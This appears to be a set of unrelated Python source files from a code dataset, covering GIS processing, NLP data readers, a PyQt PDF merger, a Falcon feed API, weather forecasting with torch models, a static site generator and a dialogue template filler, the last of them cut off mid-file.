values so that we are always dropping the baseline estimate\n \ncp = cp.sort_values(['state','county','year'], axis=0, ascending=True,kind='quicksort', na_position='first')\n\ncp = cp.drop_duplicates(subset=['state','county','year'], keep='last', inplace=False) \n\nprint(cp.head())\nprint(cp)\n\n\n# ## Step 21.\n# **create a new list of the minimum year and the maximum year found in the dataframe**\n\n# In[44]:\n\n\nyeararray = np.array(yearlist)\n\nx = min(yeararray)\ny = max(yeararray)\n\nyearlist = list(range(x,y+1))\n\ndel yeararray\nprint(list(cp))\n\n\n# ## Step 22.\n# **select rows by year; rename column; merge dataframes (same as drought method)**\n\n# In[45]:\n\n\nD = {}\n\nfor idx,i in enumerate(yearlist):\n    print(i)\n    D[i] = cp[cp.year == i]\n    # build a year-specific name for the population column\n    yearsuf = str(i)\n    name = \"pop{}\".format(yearsuf)\n    D[i] = D[i].rename(columns={'POP' : name})\n    if idx == 0:\n        all_pop = D[i]\n    else:\n        # get a subselection of columns\n        D[i] = D[i][[name, 'FIPS']]\n        print(list(D[i]))\n        all_pop = all_pop.merge(D[i], how='inner', on='FIPS')\n        #print(len(all_pop))\n        #print(idx)\n\n\n# ## Step 23.\n# **merge pop data to spatial dataframe**\n\n# In[46]:\n\n\npopcounty = sdf.merge(all_pop, how='inner', on='FIPS')\nlist(popcounty)\n\n\n# ## Step 24.\n# **write population data to geodatabase**\n\n# In[47]:\n\n\npoppath = os.path.join(workspace,\"pop\")\n\n\npopcounty.spatial.to_featureclass(location = poppath)\n\n\n# ## Step 25.\n# **Spatial Joins of Point**\n# \n# https://developers.arcgis.com/python/guide/spatially-enabled-dataframe-advanced-topics/#Spatial-Joins\n\n# In[48]:\n\n\narcpy.MakeFeatureLayer_management(plots_proj, 'tempplots')\narcpy.MakeFeatureLayer_management(pdsipath, 'temppdsi')\narcpy.MakeFeatureLayer_management(poppath, 'temppop')\n\n\n# In[49]:\n\n\norig = arcpy.ListFields('tempplots')\noriglist = list()\n\n\nfor i in orig:\n    x = i.name\n    origlist.append(x)\n\n\n# In[50]:\n\n\ntemp = 
\"temporaryjoin\"\n\narcpy.SpatialJoin_analysis('tempplots','temppop',temp, join_operation = 'JOIN_ONE_TO_ONE', join_type = 'KEEP_ALL', match_option = 'CLOSEST')\n\n\n# In[51]:\n\n\ntemp1 = \"temporatyjoin1\"\n\narcpy.SpatialJoin_analysis(temp,'temppdsi',temp1, join_operation = 'JOIN_ONE_TO_ONE', join_type = 'KEEP_ALL', match_option = 'CLOSEST')\n\n\n# In[52]:\n\n\npltdf = pd.DataFrame.spatial.from_featureclass(temp1)\n\n\n# In[53]:\n\n\ndeletelist = ['OBJECTID',\n 'Join_Count',\n 'TARGET_FID',\n 'Join_Count_1',\n 'TARGET_FID_1',\n 'Field1',\n 'FID_1',\n 'FIPS_1',\n 'SQMI_1',\n 'STATE_FIPS_1',\n 'STATE_NAME_1',\n 'Shape_Leng_1',\n 'Shape__Area_1',\n 'Shape__Length_1',\n 'countyfips',\n 'STATE_FIPS',\n 'STATE_NAME',\n 'Shape_Leng',\n 'Shape__Area',\n 'Shape__Length',\n 'COUNTY',\n 'DATE_DESC','FID']\n\nfor i in deletelist:\n if hasattr(pltdf, i):\n del pltdf[i]\n\nlist(pltdf)\n\n\n# In[54]:\n\n\nyearlist = list(range(2000,2018))\ncolumnlist = list(pltdf)\n\npltdf['final_pdsi'] = \"\"\npltdf['final_pop'] = \"\"\n\nfor i in pltdf.index:\n popstr = str(int(pltdf.at[i,plot_year]))\n pdsistr = str(int(pltdf.at[i,plot_year]) - 1)\n for y in columnlist:\n if popstr in y:\n if y.startswith('pop'):\n pltdf.at[i,\"final_pop\"] = pltdf.at[i,y]\n elif pdsistr in y:\n if y.startswith('pdsi'):\n pltdf.at[i,\"final_pdsi\"] = pltdf.at[i,y]\n\n \n\n\n# In[55]:\n\n\nnewlist = ['FIPS','SQMI','final_pdsi','final_pop']\nfor i in newlist:\n origlist.append(i)\n\n\n# In[56]:\n\n\nfor y in list(pltdf):\n if not y in origlist:\n del pltdf[y]\n\n\n# In[57]:\n\n\npltdf['final_pop'] = pd.to_numeric(pltdf['final_pop'],downcast='float')\npltdf['SQMI'] = pd.to_numeric(pltdf['SQMI'],downcast='float')\n\npltdf.loc[:,'poparea'] = pltdf.final_pop / pltdf.SQMI\n\n\n# In[58]:\n\n\nplotpath = os.path.join(workspace,\"update_plots\")\ncsvpath = os.path.join(space,\"SudekumPlotSampleUpdate.csv\")\n\npdsicounty.spatial.to_featureclass(location = plotpath)\npltdf.to_csv(csvpath)\n\n","repo_name":"houstonsudekum/arcpro_drought_population_tool","sub_path":"arcpro_drought_pop_tool.py","file_name":"arcpro_drought_pop_tool.py","file_ext":"py","file_size_in_byte":17189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2638993199","text":"from typing import Dict, Tuple, List, Iterable\nfrom overrides import overrides\nfrom conllu.parser import parse_line, DEFAULT_FIELDS\n\nfrom allennlp.common.file_utils import cached_path\nfrom allennlp.data.dataset_readers.dataset_reader import DatasetReader\nfrom allennlp.data.fields import Field, TextField, SequenceLabelField, MetadataField, ArrayField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer\nfrom allennlp.data.tokenizers import Token\n\nfrom .baseline_slam_reader import unpack_token_index, lazy_parse, FIELDS\n\nimport logging\nimport numpy as np\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\ntoken_features = ['Gender', 'Person', 'VerbForm', 'Definite', 'Mood', 'PronType', 'fPOS', 'Number', 'Tense']\n\n@DatasetReader.register(\"slam_reader\")\n@DatasetReader.register(\"slam-reader\")\nclass SLAMDatasetReader(DatasetReader):\n \"\"\"\n Reads in a CoNLL-U formatted SLAM dataset, including all Duolingo-specific\n and UD-specific features.\n\n Parameters\n ----------\n token_indexers : ``Dict[str, TokenIndexer]``, optional (default=``{\"tokens\": SingleIdTokenIndexer()}``)\n The token indexers to be applied to the words TextField.\n 
\"\"\"\n def __init__(self,\n token_indexers: Dict[str, TokenIndexer] = None,\n include_pos_features: bool = False,\n lazy: bool = False) -> None:\n super().__init__(lazy)\n self._token_indexers = token_indexers or {'tokens': SingleIdTokenIndexer()}\n self._include_pos_features = include_pos_features\n\n @overrides\n def _read(self, file_path: str):\n # if `file_path` is a URL, redirect to the cache\n file_path = cached_path(file_path)\n # i = 0\n\n with open(file_path, 'r') as conllu_file:\n logger.info(\"Reading token instances from conllu dataset at: %s\", file_path)\n\n for annotation, features in lazy_parse(conllu_file.read(), fields=FIELDS):\n # i += 1\n # if i == 1000: break\n\n annotation = [x for x in annotation if x[\"id\"] is not None]\n\n labels = [x[\"label\"] for x in annotation]\n words = [x[\"form\"] for x in annotation]\n\n token_level = [{k: v for k, v in x['feats'].items() if k in token_features} for x in annotation]\n\n numerical = {}\n categorical = {}\n token_level = {}\n\n for k, v in features.items():\n if k in ['days', 'time']:\n try:\n numerical[k] = min(float(v), 100.)\n except ValueError:\n # TODO: do some smarter missing value imputation\n numerical[k] = 0.\n else:\n categorical[k] = v\n\n yield self.text_to_instance(words, labels, categorical, numerical, token_level)\n\n @overrides\n def text_to_instance(self, # type: ignore\n words: List[str],\n token_labels: List[int] = None,\n categorical: Dict[str, str] = {},\n numerical: Dict[str, float] = {},\n token_level: Dict[str, List[str]] = {}) -> Instance:\n # pylint: disable=arguments-differ\n \"\"\"\n Parameters\n ----------\n words : ``List[str]``, required.\n The words in the sentence to be encoded.\n token_labels : ``List[int]``, optional.\n The label for whether or not each token is correct.\n\n Returns\n -------\n An instance containing words and token labels.\n \"\"\"\n fields: Dict[str, Field] = {}\n\n token_indexers = {\"tokens\": self._token_indexers[\"tokens\"]}\n\n if 'token_characters' in self._token_indexers:\n token_indexers['token_characters'] = self._token_indexers[\"token_characters\"]\n\n tokens = TextField([Token(w) for w in words], token_indexers)\n fields[\"words\"] = tokens\n\n for feature, value in categorical.items():\n if feature not in self._token_indexers.keys(): continue\n fields[feature] = TextField([Token(value)], { feature: self._token_indexers[feature] })\n\n for feature, value in numerical.items():\n fields[feature] = ArrayField(np.array([value]))\n\n #token_level_features = []\n #for token_features in token_level:\n # fields[]\n\n if token_labels is not None:\n fields[\"labels\"] = SequenceLabelField(token_labels, tokens,\n label_namespace=\"token_labels\")\n\n fields[\"metadata\"] = MetadataField({\"words\": words})\n return Instance(fields)\n","repo_name":"jbarrow/reteach","sub_path":"reteach/readers/slam_reader.py","file_name":"slam_reader.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38432969698","text":"import logging\nfrom pathlib import Path\nfrom typing import Dict\n\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (\n QAbstractItemView,\n QFileDialog,\n QListWidget,\n QListWidgetItem,\n QMessageBox,\n)\n\nfrom merge_pdfs.backend.app_data import APP_DATA\nfrom merge_pdfs.backend.pdf_writer import PDFWriter\n\nlogger = logging.getLogger(__name__)\n\n\nclass PDFListWidget(QListWidget):\n def __init__(self, *args, **kwargs) -> 
None:\n super().__init__(*args, **kwargs)\n\n self.setObjectName(\"listViewWidget\")\n self.setDragEnabled(True)\n self.setAcceptDrops(True)\n self.setDragDropOverwriteMode(False)\n self.setDragDropMode(QAbstractItemView.InternalMove)\n self.setAlternatingRowColors(True)\n self.setSelectionMode(QAbstractItemView.ExtendedSelection)\n\n # dict that maps item label with its paths\n self._addedFiles: Dict[str, Path] = {}\n\n def dragEnterEvent(self, e: QtGui.QDragEnterEvent) -> None:\n if e.mimeData().hasUrls:\n e.accept()\n else:\n e.ignore()\n\n def dropEvent(self, event: QtGui.QDropEvent) -> None:\n # check drop action\n dropAction = event.dropAction()\n\n # if action is MoveAction use parent behavior\n # it basically means we want to change order of existing items\n if dropAction == Qt.MoveAction:\n super().dropEvent(event)\n\n # if action is CopyAction we are dropping local files to QListWidget\n elif dropAction == Qt.CopyAction:\n mimeData = event.mimeData()\n if mimeData.hasUrls:\n event.accept()\n\n for url in mimeData.urls():\n if url.isLocalFile():\n self._addItem(url.toLocalFile())\n\n else:\n event.ignore()\n\n # otherwise ignore action\n else:\n event.ignore()\n\n def _removeItem(self, item: QListWidgetItem):\n itemText = item.text()\n logger.debug(\"Removing '%s' from the list\", itemText)\n # not really needed, because we took it from the QWidgetList,\n # but who cares (we want to be safe as almighty Java people)\n if itemText in self._addedFiles:\n del self._addedFiles[itemText]\n self.takeItem(self.row(item))\n\n def removeSelectedItems(self):\n selectedItems = self.selectedItems()\n logger.debug(\"Files to be removed from the list: %d\", len(selectedItems))\n for item in selectedItems:\n self._removeItem(item)\n\n # TODO it should present a pop up asking if user is sure\n def removeAllItems(self):\n allItems = self.count()\n logger.debug(\"All files to be removed from the list: %d\", allItems)\n\n # remove all items\n while self.count():\n item = self.takeItem(0)\n self._removeItem(item)\n\n # reset _addedFiles dict\n self._addedFiles = {}\n\n def _addItem(self, item: str):\n itemPath = Path(item)\n itemText = itemPath.name\n\n if itemText not in self._addedFiles:\n logger.debug(\"Adding '%s' to the list\", itemText)\n self._addedFiles[itemText] = itemPath\n self.addItem(itemText)\n else:\n logger.warning(\"Ignoring '%s', already on the list\", itemText)\n\n def addItemsFromDialog(self):\n openDir = str(APP_DATA.getLastDir())\n\n selectedFiles, _ = QFileDialog.getOpenFileNames(\n self,\n \"Add file(s)\",\n openDir,\n \"PDF Files (*.pdf);;Images (*.png *.jpg *.jpeg)\",\n options=QFileDialog.DontUseNativeDialog,\n )\n\n if selectedFiles:\n # save lastOpenedDir in settings file\n APP_DATA.save_setting(\"lastDir\", str(Path(selectedFiles[0]).parent))\n\n for _file in selectedFiles:\n self._addItem(_file)\n\n def saveFile(self):\n # ignore if no files were added\n if not self._addedFiles:\n logger.debug(\"Ignoring save action due to empty list\")\n return\n\n openDir = str(APP_DATA.getLastDir())\n newFile, _ = QFileDialog.getSaveFileName(\n self,\n \"Save file\",\n openDir,\n \"PDF files (*.pdf)\",\n options=QFileDialog.DontUseNativeDialog,\n )\n\n # skip if file name was not specified or cancel button was pressed\n if not newFile:\n return\n\n # make sure files will be saved in correct order\n # save as they appear in the UI\n orderedKeys = [self.item(item).text() for item in range(self.count())]\n orteredValues = [self._addedFiles[key] for key in orderedKeys]\n\n pdfWriter = 
PDFWriter()\n pdfWriter.merge_files(*orteredValues)\n pdfWriter.save(newFile)\n\n QMessageBox.information(\n self, \"MergePDFs\", f\"File {newFile} was successfully saved\", QMessageBox.Ok\n )\n","repo_name":"lukaszKielar/merge-pdfs","sub_path":"merge_pdfs/gui/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1501063859","text":"import argparse\nfrom os import path\nimport time\nimport random\n\nimport pandas as pd\n\nfrom scripts.utils import print_progress_bar\nfrom wikisearch.consts.mongo import CSV_SEPARATOR\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--test\", help=\"Path to testing file\")\n parser.add_argument(\"-max\", \"--max_distance\", default=14, help=\"The maximum distance exist in the dataset\")\n parser.add_argument(\"-a\", \"--amount_per_distance\", default=10, help=\"amount of couples per distance\")\n\n args = parser.parse_args()\n\n test_dataset = pd.read_csv(args.test, sep=CSV_SEPARATOR).values\n dataset_len = len(test_dataset)\n\n # Dictionary where the distances are the keys and the value is a list of couples where the keyed\n # distance is the distance between them\n max_distance = args.max_distance\n distances_couples = {idx: [] for idx in range(1, max_distance + 1)}\n\n start = time.time()\n for idx, (source, destination, distance) in enumerate(test_dataset, 1):\n distances_couples[distance].append((source, destination, distance))\n print_progress_bar(\n idx, dataset_len, time.time() - start, prefix=f'Collecting distances\\' couples', length=50)\n\n rnd_generator = random.Random()\n randomed_couples_per_distance = []\n couples_amount_per_distance = args.amount_per_distance\n for idx in range(1, max_distance + 1):\n couples_amount_per_distance = args.amount_per_distance\n if len(distances_couples[idx]) < couples_amount_per_distance:\n couples_amount_per_distance = len(distances_couples[idx])\n randomed_couples_per_distance.extend(\n rnd_generator.sample(distances_couples[idx], couples_amount_per_distance))\n\n randomed_couples_per_distance_df = pd.DataFrame.from_records(randomed_couples_per_distance,\n columns=['source', 'destination', 'min_distance'])\n\n randomed_couples_per_distance_df.to_csv(\n path.join(path.dirname(args.test), path.splitext(path.basename(args.test))[0] + \"_astar.csv\"),\n header=True, index=False, sep='\\t')\n","repo_name":"itaiperi/wikisearch","sub_path":"scripts/create_test_astar.py","file_name":"create_test_astar.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"830377081","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nimport time\nimport falcon\nimport logging\nfrom uggipuggi.constants import USER_FEED, MAX_USER_FEED_LOAD, PUBLIC_RECIPES\nfrom uggipuggi.libs.error import HTTPBadRequest\nfrom uggipuggi.helpers.logs_metrics import init_logger, init_statsd\nfrom uggipuggi.controllers.hooks import serialize, supply_redis_conn\n\n\nlogger = init_logger()\nstatsd = init_statsd('up.controllers.user_feed')\n\n@falcon.before(supply_redis_conn)\n@falcon.after(serialize)\nclass Item(object):\n def __init__(self):\n self.kafka_topic_name = 'user_feed_item'\n\n #@falcon.after(group_kafka_item_get_producer)\n @statsd.timer('get_user_feed_get')\n def on_get(self, req, resp):\n statsd.incr('user_feed.invocations')\n 
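# --- Illustrative aside (editor's sketch, not part of the original record) ---
# The surrounding on_get handler pages through a user feed the same way this
# sketch does: item ids come newest-first from a Redis sorted set (ZREVRANGE)
# and the item hashes are fetched in a single round trip with a pipeline. The
# key name, connection, and function name here are assumptions for illustration.
import redis

def load_feed_page(conn: redis.Redis, feed_key: str, start: int = 0, limit: int = 30):
    item_ids = conn.zrevrange(feed_key, start, start + limit)  # newest first
    pipe = conn.pipeline(True)      # transactional pipeline: one round trip
    for item_id in item_ids:
        pipe.hgetall(item_id)       # queue one HGETALL per feed item
    return pipe.execute()           # list of hash dicts, aligned with item_ids
# --- end aside ---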
req.kafka_topic_name = '_'.join([self.kafka_topic_name, req.method.lower()])\n user_feed_id = USER_FEED + req.user_id\n logger.debug(\"Getting user feed: %s\" %req.user_id)\n try:\n start = req.params['query'].get('start', 0)\n limit = req.params['query'].get('limit', MAX_USER_FEED_LOAD)\n end = start + limit\n except KeyError:\n start = 0\n limit = MAX_USER_FEED_LOAD\n end = start + limit\n # For the time being get all the feed\n user_feed_item_ids = req.redis_conn.zrevrange(user_feed_id, start, end)\n logger.debug(\"Length of feed: %d\" %len(user_feed_item_ids))\n if len(user_feed_item_ids) < MAX_USER_FEED_LOAD: \n num_public_feed_len = MAX_USER_FEED_LOAD - len(user_feed_item_ids)\n logger.debug(\"Getting feed from PUBLIC recipes: %d\" %num_public_feed_len)\n \n pipeline = req.redis_conn.pipeline(True)\n for feed_id in user_feed_item_ids:\n pipeline.hgetall(feed_id)\n \n start = 0 \n public_recipe_item_ids = req.redis_conn.zrevrange(PUBLIC_RECIPES, start, num_public_feed_len)\n for feed_id in public_recipe_item_ids:\n pipeline.hgetall(feed_id)\n \n # Only here we supply the key as well because in feed we have both recipes and activities\n # and key starting with \"r:\" and activity starts with \"act:\"\n #resp.body = [{k: v} for k, v in zip(user_feed_item_ids, pipeline.execute())]\n resp.body = pipeline.execute()\n #resp.body = [dict(i, images=eval(i['images'])) for i in resp.body]\n # Redis DB stores list as string, so convert back the string to list\n for i in range(len(resp.body)):\n resp.body[i]['images'] = eval(resp.body[i]['images'])\n \n resp.status = falcon.HTTP_OK","repo_name":"krishnadubba/up_be_falcon","sub_path":"uggipuggi/controllers/user_feed.py","file_name":"user_feed.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28595311515","text":"from datetime import datetime, timedelta\n\nimport numpy as np\nimport pandas as pd\nimport requests\nimport torch\nfrom fastapi.logger import logger\n\nimport config\nimport crud\nimport utils as helper\nfrom config import SessionLocal\nfrom schemas import WeatherInfoSchema\n\n# loading data just once\ndevice = torch.device('cpu')\ndata_mean, data_std = np.load('data/stat.npy')\nmlp_model = torch.jit.load('ml_models/mlp_jit_L1.pt', map_location=device)\nmlp_model.eval()\ngru_model = torch.jit.load('ml_models/gru_jit_128_4_L1_final.pt', map_location=device)\ngru_model.eval()\nenvs = config.Settings()\n\n\n# we will not stream data to frontend. 
Instead we will insert data to database\n# def stream_weather_data():\n# data = weather_forcasting()\n# if data is None:\n# return\n# stream_data = json.dumps(\n# {\n# \"actual_temperature\": data[\"actual_temperature\"],\n# \"baseline_temperature\": data[\"baseline_temperature\"],\n# \"mlp_temperature\": data[\"mlp_temperature\"],\n# \"gru_temperature\": data[\"gru_temperature\"],\n# \"weather_date\": data[\"weather_date\"]\n# })\n# yield f\"data:{stream_data}\\n\\n\"\n\n\n# TODO insert data to database\ndef weather_forcasting():\n db = SessionLocal()\n date = datetime.utcnow() + timedelta(hours=1)\n current_weather_date = datetime(date.year, date.month, date.day, date.hour)\n weather_date_one_hour_ahead = current_weather_date + timedelta(hours=1)\n try:\n act_temperature = get_openweather_data(db, weather_date=current_weather_date)\n window_weather_info = get_window_weather_data(db)\n weather_features = helper.process_weather_data(window_weather_info)\n baseline_prediction = baseline_temperature_prediction(weather_features)\n norm_weather_features = np.array((weather_features - data_mean) / data_std)\n mlp_prediction = mlp_temperature_prediction(norm_weather_features)\n gru_prediction = gru_temperature_prediction(norm_weather_features)\n logger.info(\n f\"Creating new row with predictions: \"\n f\"{baseline_prediction}, {mlp_prediction}, {gru_prediction} for date: {weather_date_one_hour_ahead}.\")\n add_temperature_prediction(db, weather_date_one_hour_ahead, baseline_prediction, mlp_prediction,\n gru_prediction)\n logger.info(\"New record with predictions was created.\")\n db.close()\n return {\n \"actual_temperature\": act_temperature,\n \"baseline_temperature\": baseline_prediction,\n \"mlp_temperature\": mlp_prediction,\n \"gru_temperature\": gru_prediction,\n }\n except Exception as e:\n print(e)\n\n\ndef get_openweather_data(db_session: SessionLocal, weather_date: datetime):\n try:\n url = f\"https://api.openweathermap.org/data/2.5/weather?\" \\\n f\"lat=48.171704276327475&lon=17.211020714029374&units=metric&appid={envs.OPEN_WEATHER_API_KEY}\"\n payload = {}\n headers = {}\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n weather_info = WeatherInfoSchema()\n weather_info.weather_date = weather_date\n weather_info.actual_temperature = response.json()[\"main\"][\"temp\"]\n weather_info.humidity = response.json()[\"main\"][\"humidity\"]\n # convert form hPa to mmHg\n weather_info.pressure = response.json()[\"main\"][\"pressure\"] * 0.75006156130264\n weather_info.wind_speed = response.json()[\"wind\"][\"speed\"]\n logger.info(\"Updating current weather info: \", weather_info.weather_date, \" with values: humidity: \",\n weather_info.humidity, \" pressure: \", weather_info.pressure, \" wind speed: \",\n weather_info.wind_speed,\n \" actual temperature: \", weather_info.actual_temperature)\n update_current_weather_info(db_session, weather_info=weather_info)\n logger.info(\"Successfully current weather info.\")\n return weather_info.actual_temperature\n except Exception as e:\n logger.exception(e)\n\n\ndef insert_actual_temperature(db_session: SessionLocal, weather_info: WeatherInfoSchema):\n try:\n crud.create_weather_info(db_session, info=weather_info)\n except Exception as e:\n logger.exception(e)\n\n\ndef update_current_weather_info(db_session: SessionLocal, weather_info: WeatherInfoSchema):\n try:\n crud.update_current_weather_info(db_session, weather_info=weather_info)\n except Exception as e:\n logger.exception(e)\n\n\ndef 
get_window_weather_data(db_session: SessionLocal):\n try:\n return crud.get_info_for_last_window_hours(db_session, window_hours=6)\n except Exception as e:\n logger.exception(e)\n\n\ndef baseline_temperature_prediction(weather_info: pd.DataFrame):\n baseline_prediction = weather_info[\"actual_temperature\"].mean() + 1\n return baseline_prediction\n\n\ndef mlp_temperature_prediction(weather_features: np.array):\n features = np.reshape(weather_features, (1, 6, 8))\n features = torch.from_numpy(features).float().to(device)\n prediction = mlp_model(features)\n return float(prediction.detach().numpy()[0][0][0])\n\n\ndef gru_temperature_prediction(weather_features: np.array):\n features = np.reshape(weather_features, (1, 6, 8))\n features = torch.from_numpy(features).float().to(device)\n h0 = torch.zeros(2, 6, 128).to(device)\n prediction = gru_model(features, h0)\n return float(prediction.detach().numpy()[0][0])\n\n\ndef add_temperature_prediction(db_session: SessionLocal, weather_date, baseline, mlp, gru):\n try:\n crud.add_predicted_temperature(db_session, weather_date, baseline, mlp, gru)\n except Exception as e:\n logger.exception(e)\n","repo_name":"macodroid/fastapi-weather-prophet","sub_path":"forcast.py","file_name":"forcast.py","file_ext":"py","file_size_in_byte":5726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7025815605","text":"import os\nimport markdown\nfrom jinja2 import Environment, FileSystemLoader\n\n# Define the directories for the site content and templates\nPAGE_DIR = 'pages'\nTEMPLATE_DIR = 'templates'\n\n# Define the file names for the site pages\nHOME_PAGE = 'index.html'\nABOUT_PAGE = 'about.html'\nERROR_PAGE = '404.html'\n\n# Load the Jinja2 templates\nenv = Environment(loader=FileSystemLoader(TEMPLATE_DIR))\nhomepage_template = env.get_template('homepage.html')\narticle_template = env.get_template('article.html')\npage_template = env.get_template('page.html')\n\n# Initialize the list of articles\narticles = []\n\n# Loop through the Markdown files in the pages directory\nfor filename in os.listdir(PAGE_DIR):\n if filename.endswith('.md'):\n # Read the Markdown file and convert it to HTML\n with open(os.path.join(PAGE_DIR, filename)) as f:\n content = markdown.markdown(f.read())\n\n # Parse the title from the Markdown file\n title = content.split('\\n')[0][1:].strip()\n\n # Determine the URL for the page\n if filename == 'index.md':\n url = HOME_PAGE\n else:\n url = filename[:-3] + '.html'\n\n # Create a dictionary for the article and add it to the list\n article = {'title': title, 'content': content, 'url': url}\n articles.append(article)\n\n # Generate the HTML for the article\n html = article_template.render(article=article)\n\n # Write the HTML to a file\n with open(os.path.join(os.getcwd(), url), 'w') as f:\n f.write(html)\n\n# Generate the HTML for the homepage\nhomepage_html = homepage_template.render(articles=articles)\n\n# Write the HTML to a file\nwith open(os.path.join(os.getcwd(), HOME_PAGE), 'w') as f:\n f.write(homepage_html)\n\n# Generate the HTML for the about page\nabout_html = page_template.render(title='About', content='
This is the about page.
')\n\n# Write the HTML to a file\nwith open(os.path.join(os.getcwd(), ABOUT_PAGE), 'w') as f:\n f.write(about_html)\n\n# Generate the HTML for the 404 page\nerror_html = page_template.render(title='404 - Page Not Found', content='
The requested page was not found.
')\n\n# Write the HTML to a file\nwith open(os.path.join(os.getcwd(), ERROR_PAGE), 'w') as f:\n f.write(error_html)\n","repo_name":"jamesgathuru001/Static-Stite-Generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30373231982","text":"from tools.dialogs import person as personDialog\nimport numpy as np\n\n\n# this class prepares reports from loaded dialog\n# REPORT Description:\n# The report returns list of noun-related words in each sentence per dialog part\n# NOTE:\n# This report is not meant to be saved\nclass NounPhraseParts(object):\n\n\t# constructor\n\tdef __init__(self, reportsDir):\n\t\tself.__outputDir = reportsDir\n\t\tself._dialog = None\n\t\tself._dialog_pos = None\n\t\tself._noun_tags = ['NN', 'NNP', 'NNS']\n\n\n\t# sets dialog for this report\n\tdef SetDialog(self, newDialog):\n\t\tself._dialog = newDialog\n\n\n\t# sets POS dialog for this report\n\tdef SetDialogPos(self, newDialog):\n\t\tself._dialog_pos = newDialog\n\n\n\t# returns list with noun phrases\n\tdef ExtractNounPhrases(self):\n\t\tpeople = personDialog.Person()\n\t\t# dont do anything unless everything is properly set up\n\t\tparts = self._dialog_pos.GetDialogPos()\n\t\tif parts == None:\n\t\t\treturn None\n\n\t\tresult = []\n\t\tfor part in parts:\n\t\t\tuniqueNouns = set()\n\t\t\tif len(part['sentence']) < 2:\n\t\t\t\tcontinue\n\t\t\t[ uniqueNouns.add(w[0].lower()) for w in part['pos'] if (w[1] in self._noun_tags) and len(w[0]) > 1]\n\t\t\tresult.append(people.GetEmptyNounsPerson(part['name'], part['role'], uniqueNouns))\n\t\treturn result\n\n\n\t# saves the report to file\n\tdef SaveToFile(self):\n\t\treturn None","repo_name":"polakluk/supreme-court-analysis","sub_path":"tools/reports/nlp/nounphraseparts.py","file_name":"nounphraseparts.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1885642555","text":"from GRIDD.globals import *\nimport random\n\nfrom simplenlg.framework.NLGFactory import *\nfrom simplenlg.realiser.english.Realiser import *\nfrom simplenlg.lexicon.Lexicon import *\nfrom simplenlg.phrasespec.VPPhraseSpec import *\n\nfrom simplenlg.features.NumberAgreement import *\nfrom simplenlg.features.Feature import *\nfrom simplenlg.features.Tense import *\nfrom simplenlg.features.Person import *\n\nfrom itertools import chain\n\n\n\"\"\"\nThis class works in conjunction with the service-implementation of the InferenceEngine\nin order to find appropriate template matches for a given concept graph and properly fill in the \ntemplates for each match.\n\nExecution Sequence:\n ResponseTemplateFinder\n InferenceEngine\n ResponseTemplateFiller\n\"\"\"\n\nSPECIAL_NOT_CHECK_AWARE = {'unknown_answer_to_user_q'}\n\nclass ResponseTemplateFiller:\n \"\"\"\n Fills out a template based on the provided variable matches and concept expressions.\n \"\"\"\n\n def __init__(self):\n self.lexicon = Lexicon.getDefaultLexicon()\n self.nlgFactory = NLGFactory(self.lexicon)\n self.realiser = Realiser(self.lexicon)\n\n def __call__(self, matches, expr_dict, cg, aux_state, fallback_options):\n react_cands = []\n present_cands = []\n rpresent_cands = []\n\n previous_user_requests = [p for p in chain(list(cg.predicates('user', REQ_ARG)), list(cg.predicates('user', REQ_TRUTH)))\n if aux_state.get('turn_index', -1) in cg.features.get(p[3], {}).get(UTURN, set())\n and 
not cg.has(p[3], USER_AWARE)]\n answer_checks = {}\n ignore = set()\n for p in previous_user_requests:\n constraints = {t for s,t,l, in cg.metagraph.out_edges(p[2], RREF)}\n for t in constraints:\n if cg.has(predicate_id=t) and cg.type(t) == TYPE:\n ignore.update({t, cg.object(t)})\n answer_checks[p] = constraints - ignore\n\n for rule, (pre_graph, post, solutions_list) in matches.items():\n repetition_type = list(post.values())[0].repetition_type\n for match_dict, virtual_preds in solutions_list:\n # add constants to match\n const_matches = {n: n for n in pre_graph.concepts() if n not in match_dict}\n match_dict.update(const_matches)\n\n if repetition_type == '_r':\n # (1) pick unused form, if there is more than one form, else pick used form\n candidates = self._get_candidates(post, aux_state, rule)\n selection = random.choice(candidates)\n elif repetition_type == '_nr':\n # if template never used before, do (1)\n if rule not in aux_state.get('responses', {}):\n candidates = self._get_candidates(post, aux_state, rule)\n selection = random.choice(candidates)\n else:\n continue # skip to next template\n elif repetition_type == '_ur':\n # get current realization of previously used form\n # if unique from previous, do (1)\n candidates = list(post.keys())\n prev = aux_state.get('responses', {}).get(rule, None)\n if prev is None: # template never used before\n selection = random.choice(candidates)\n else: # template used before\n prev_form, prev_string = prev\n curr = self._fill_template(rule, post[prev_form], match_dict, expr_dict, cg)\n if curr != prev_string: # is a unique match\n candidates.remove(prev_form)\n else: # is not a unique match\n continue # skip to next template\n selection = random.choice(candidates)\n\n rule_info = (rule, selection)\n selection = post[selection]\n response_str = self._fill_template(rule_info, selection, match_dict, expr_dict, cg)\n if response_str is None or (repetition_type == '_nr' and response_str in aux_state.get('all_resp', set())):\n continue # skip to next template\n\n if selection.template_type == '_react':\n 